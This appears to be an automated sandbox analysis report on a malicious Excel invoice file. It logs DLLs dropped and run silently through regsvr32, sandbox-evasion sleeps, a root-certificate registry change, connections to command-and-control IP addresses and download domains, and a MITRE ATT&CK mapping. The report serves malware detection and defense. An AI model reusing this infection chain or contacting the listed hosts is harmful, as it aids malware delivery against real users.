Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\nnmumzom.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\kxwni.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\sxzjqf.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zipJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gjeicn6u9[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\clh6qq[1].zipJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\l3v7tq4[1].rarJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\or3peb[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key enumerated: More than 470 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1796Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -159000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -138000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -290000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -263000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -137000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -122000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -135000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -175000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -243000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -399000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -179000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -650000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -168000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -332000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -142000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -292000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -169000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -304000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -468000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -125000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -132000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -321000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -294000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -278000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -141000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -151000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -309000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -157000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -322000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -267000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -171000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -276000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2724Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2812Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -426000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -166000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -302000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -260000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -264000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -317000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -152000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -522000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -588000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -127000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -318000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -131000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -252000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -160000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -263000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -163000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -134000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -135000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -313000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -133000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -271000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -140000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -161000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -241000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -153000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -175000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -342000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -343000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2456Thread sleep time: -121000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2128Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -171000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -310000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -261000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -126000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -345000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -334000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -250000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -311000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -316000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2960Thread sleep time: -147000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3068Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -122000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -124000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -148000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -258000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -178000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -123000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -257000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -130000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -170000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2860Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep count: 65 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1036Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -164000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -172000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -336000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -139000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -242000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -176000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -330000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2808Thread sleep time: -136000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 198.57.200.100 202
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 69.164.207.140 60
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 211.110.44.63 233
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 194.225.58.214 187
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\kxwni.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll
Source: regsvr32.exe, 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, regsvr32.exe, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: regsvr32.exe, 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, regsvr32.exe, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.2486410354.0000000000990000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2516567557.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2467197271.0000000000A00000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2471265240.0000000000BB0000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2448040714.00000000009A0000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.2486555810.00000000009F0000.00000002.00000001.sdmp, regsvr32.exe, 00000010.00000002.2433144720.00000000008B0000.00000002.00000001.sdmp, regsvr32.exe, 00000011.00000002.2534125452.00000000009F0000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionProcess Injection112Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting32LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsSystem Information Discovery23VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 342716 Sample: 1_Total New Invoices-Thursd... Startdate: 21/01/2021 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Document exploit detected (drops PE files) 2->56 58 7 other signatures 2->58 7 EXCEL.EXE 247 73 2->7         started        process3 dnsIp4 40 reliablelifts.co.in 103.83.81.27, 443, 49169 ZINIOSS-AS-INZiniosInformationTechnologyPvtLtdIN India 7->40 42 creditoenusa.com 192.185.224.50, 443, 49191 UNIFIEDLAYER-AS-1US United States 7->42 44 3 other IPs or domains 7->44 32 C:\Users\user\AppData\Local\Temp\sxzjqf.dll, PE32 7->32 dropped 34 C:\Users\user\AppData\Local\...\nnmumzom.dll, PE32 7->34 dropped 36 C:\Users\user\AppData\Local\Temp\kxwni.dll, PE32 7->36 dropped 38 6 other malicious files 7->38 dropped 62 Document exploit detected (creates forbidden files) 7->62 64 Document exploit detected (process start blacklist hit) 7->64 66 Document exploit detected (UrlDownloadToFile) 7->66 12 regsvr32.exe 7->12         started        14 regsvr32.exe 7->14         started        16 regsvr32.exe 7->16         started        18 7 other processes 7->18 file5 signatures6 process7 process8 20 regsvr32.exe 12->20         started        23 regsvr32.exe 9 14->23         started        26 regsvr32.exe 9 16->26         started        28 regsvr32.exe 9 18->28         started        30 regsvr32.exe 9 18->30         started        dnsIp9 60 System process connects to network (likely due to code injection or exploit) 20->60 46 198.57.200.100, 3786, 49173, 49179 UNIFIEDLAYER-AS-1US United States 23->46 48 194.225.58.214, 443, 49170, 49174 TUMS-IR-ASIR Iran (ISLAMIC Republic Of) 23->48 50 2 other IPs or domains 23->50 signatures10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
1_Total New Invoices-Thursday January 21_2021.xlsm27%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hknmwj[1].zip9%ReversingLabsWin32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\nnmumzom.dll9%ReversingLabsWin32.Trojan.Generic

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://211.110.44.63:5353/0%Avira URL Cloudsafe
https://69.164.207.140/0%Avira URL Cloudsafe
https://69.164.207.140:3388/C0%Avira URL Cloudsafe
http://ocsp.entrust.net030%URL Reputationsafe
